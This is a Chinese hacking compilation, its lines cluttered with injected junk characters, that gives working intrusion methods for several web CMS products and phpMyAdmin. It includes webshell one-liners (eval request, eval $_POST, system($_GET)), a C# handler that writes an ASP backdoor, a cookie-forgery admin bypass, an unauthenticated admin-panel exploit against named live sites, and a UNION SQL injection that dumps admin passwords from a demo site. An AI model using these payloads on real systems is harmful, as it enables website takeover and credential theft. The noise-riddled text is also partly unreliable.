<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">. ?, S- U! L0 `$ y: d# w
Upload a new file:<br>
0 r; h9 `" ~1 T1 O/ f<input type="file" name="NewFile" size="50"><br>
4 F% {, {( l* p" z7 Y<input id="btnUpload" type="submit" value="Upload">' Q; B" y$ \: i& b
</form>
& \2 A1 n9 p M5 J-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( u4 o0 x, |, X/ V6 c* t4 @. U2 Q7 @8 S; @/ V9 |
SDcms 后台拿webshell# e( a# f6 L3 e" M( u" I+ t5 v6 T; c& ~
* H) H+ K8 m8 Y* e. o
第一种方法:' J6 K ~3 n) t; W
进入后台-->系统管理-->系统设置-->系统设置->网站名称;4 Y% T9 ]& F7 K' q- G" C3 A- R
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx: {/ v4 M6 J. r5 t
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
/ A6 f% [; a: o3 L- j5 t第二种方法:
5 k7 L- @' Q, a2 |进入后台-->系统管理-->系统设置-->系统设置->上传设置;( n5 M2 A2 r" O, C" o/ H6 b _
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!# u- |1 V1 E. J7 s& N8 b% O) | ^
第三种方法:
' \ E3 X* R: t. F! p: R进入后台-->界面管理-->模板文件管理-->创建文件
# a: n d3 U" w$ U# z6 y文件名写入getshell.ashx
& r6 ?0 t) Y9 m8 {* y内容写入下面内容:
/ i: V+ r) m0 T, K3 d/====================复制下面的=========================/2 y! K9 L# y% D! K! a
<%@ WebHandler Language="C#" Class="Handler" %>
/ e9 j% D4 B0 k) g- Z$ D9 j9 | Cusing System;
3 H6 l# t( V6 w0 Cusing System.Web;
+ J( E! J2 B" r( e3 I2 Susing System.IO;
6 R' L" ~. ^9 j9 s1 y' Upublic class Handler : IHttpHandler {
% }+ _( C1 ^/ G6 H' @public void ProcessRequest (HttpContext context) {
7 T% D q: V6 J/ ucontext.Response.ContentType = "text/plain";0 P7 I- G3 R: n' x# o3 \' E
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));9 n3 V- j/ E. ^
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
$ Q3 l" h5 W' a6 D% ufile1.Flush();$ o( k+ C& n) D9 p, ?
file1.Close();6 H6 l, |6 G Y' C+ g0 P
}
3 r8 z: r; b) y, c) lpublic bool IsReusable {: k0 p# |* t V0 Z/ A \0 E) ~
get {
+ \4 N1 o% \$ w: e* ?% v8 V/ K- `. yreturn false;
* n0 H' T# b. r}& |' s. B9 ~; k0 U. l, }; R" u3 K
}0 I1 f. Y8 N8 p' u8 B' Z' t
}5 T7 Y+ r$ E. S- E. R. R
/=============================================/3 \- T& v4 \* G7 i' A7 T
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx, ]6 `5 a8 v1 o7 L8 E# @6 P
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接# K( F. v* ^& l& ?
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 w& f" x% @3 ^* f1 U! J
9 _2 s0 D5 L$ C4 L% rESCMS网站管理系统0day
9 n# `( }# b* u- F3 Z, a$ n% h$ W4 Z. l4 v$ O
后台登陆验证是通过admin/check.asp实现的
( w0 t9 t. V( }: {) T- ^3 o2 V+ ?/ s' ]7 d1 u1 @4 J
首先我们打开http://target.com/admin/es_index.html' V9 V" p$ M) W8 G- J9 v0 b
然后在COOKIE结尾加上5 F) R0 y$ |* G' t7 C, s" V
; ESCMS$_SP2=ES_admin=st0p;5 n# y7 T0 d8 Y/ F
修改,然后刷新: s; ^" h) [5 y, L) L5 g4 d
进后台了嘎..
9 }! G+ M6 W1 f然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
3 Q @" |/ L2 Q. }2 o3 b' j3 @' K" `! y1 Z/ U
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
) |' Y( |( N! n* @# A嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp4 G, @% R% V7 b4 j, L
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..* C' j' q* o& a* i1 Q1 C: G5 o% B
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了$ B6 Y) t x/ s4 h* v
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% C8 u3 ]3 w9 @# p
" U/ ~/ J; b* {5 c" t) j& ?* \宁志网站管理系统后台无验证漏洞及修复/ [2 f* V; v$ t+ H7 r$ c, ~
2 m* F' i; p9 S1 e网上搜了一下,好像没有发布.如有雷同纯粹巧合!' i# a6 j4 h6 P' N* Q4 \; N# g( O
官方网站:www.ningzhi.net8 H( v, H% L1 D d. c4 q! s
学校网站管理系统 V.2011版本
" a: m9 v" f$ ?( {% l8 Shttp://down.chinaz.com/soft/29943.htm $ b* D7 u$ @0 E; N+ Z5 j
其它版本(如:政府版等),自行下载.7 l d4 w# R. R# m5 R
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~. e+ h5 [5 c) B$ D8 H4 I
login.asp代码如下:
& Y1 K1 ?8 e, U* v/ J# J. S<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 4 ^6 y% I: m3 q- {% p* R: r
manage.asp代码我就不帖出来了.反正也没验证.
& h) B ~# D( A( A只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
2 g# g. Z1 N# [; h! I4 k漏洞利用:
7 o* p; k0 |4 R# V直接访问http://www.0855.tv/admin/manage.asp
" ]8 D% {1 ~' q9 R% h数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
+ I2 Z* T5 w) c----------------------------------------------------------------------------------------------------------------------------------------------------------------------------# j" ?- `9 |8 K
0 h9 \7 v1 p) o2 m- \: M- T9 @phpmyadmin拿shell的四种方法总结及修复6 j$ t( h, f, g- y( l
+ x. N8 _* l) j3 w, ~/ y方法一:. W8 s% e" \1 f; [- f
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );1 x+ n# l: g5 s- B' R) Y
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');" Y o2 ~% Y; s8 j+ J4 V, R
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
1 q, q4 @! P$ }9 L8 N----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
, E8 o9 T" h0 v- P7 F 一句话连接密码:7on% f# z, i- d1 R- }+ N3 {
方法二:+ x3 j: E; e( X8 n. W! Y$ ?9 R
读取文件内容: select load_file('E:/xamp/www/s.php'); c4 h' [! h* b6 f9 L" }
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'9 h6 z5 j0 c$ ^& b9 g9 e
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
8 R4 y( _- m( q- C" o( `' I' S方法三:
( m6 ?8 ]' H9 }1 P9 Z: AJhackJ版本 PHPmyadmin拿shell
" X8 O" I" P, T) Q# TCreate TABLE study (cmd text NOT NULL);
* q5 v) ^3 g9 l6 N; v$ h) G' HInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
1 O3 S% Z( @& L) {/ z4 _; Y9 p5 Yselect cmd from study into outfile 'E:/wamp/www/7.php';
b" o) ~# e: s U& UDrop TABLE IF EXISTS study;, ~7 J; r7 ^) O7 Z
<?php eval($_POST[cmd])?>6 x, E! v3 h2 u/ g3 }2 Z) m' X
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。, w& a. b6 n7 v! e) b* ]+ t8 z
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1# g6 }0 f0 d% l4 b; a8 K: l* ~
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 17 s+ b; E5 [& F' ^4 a( Z
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
9 o! }7 A% }4 R \2 W( e方法四:8 `% j( P4 ^. ]% q
select load_file('E:/xamp/www/study.php');6 k6 H, i8 _6 K0 H* s
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
4 S$ |8 p$ p; {9 X* ?5 @然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
3 p( p. a7 \3 ?. J7 |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
- A& E9 _$ U3 L' Z
% K' v3 t) u( e2 Z; PNO.001中学网站管理系统 Build 110628 注入漏洞: T! _& E9 n1 F+ s; r5 v6 r
. `5 I; p# d) C4 Z2 n4 CNO.001中学网站管理系统功能模块:" l9 U. f1 a2 {# E9 T% c3 N
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
( G) W# `- J9 ~2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息% H- ?5 ~) k" R0 h+ w- e
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
1 t' d+ H& k/ r( C4.视频图片管理:一级分类,动态添加视频或者图片等信息
" j A- p) ^/ K H* ~$ A; h5.留言管理:对留言,修改,删除、回复等管理. V4 n( i* P0 @2 k" G' u
6.校友频道:包括校友资料excel导出、管理等功能7 o' G4 x# n( d# t
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页1 u" s) _, w# T) G0 j8 g
默认后台:admin/login.asp b- q4 i4 T9 V: y) c
官方演示:http://demo.001cms.net6 F7 W! R* f# ]+ m. p/ e' Y# \1 d
源码下载地址:http://down.chinaz.com/soft/30187.htm( q) }1 P8 }& m3 ^* e
EXP:
1 S* a0 m7 i3 U) u Kunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! j4 H5 b( I8 ]测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
2 v0 G" x7 z/ k' R# G8 B; i, \) H$ X7 dgetshell:后台有备份,你懂的
' ]9 f# b* g- i& ^另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
# L/ @" f& R% }8 w5 n: C------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |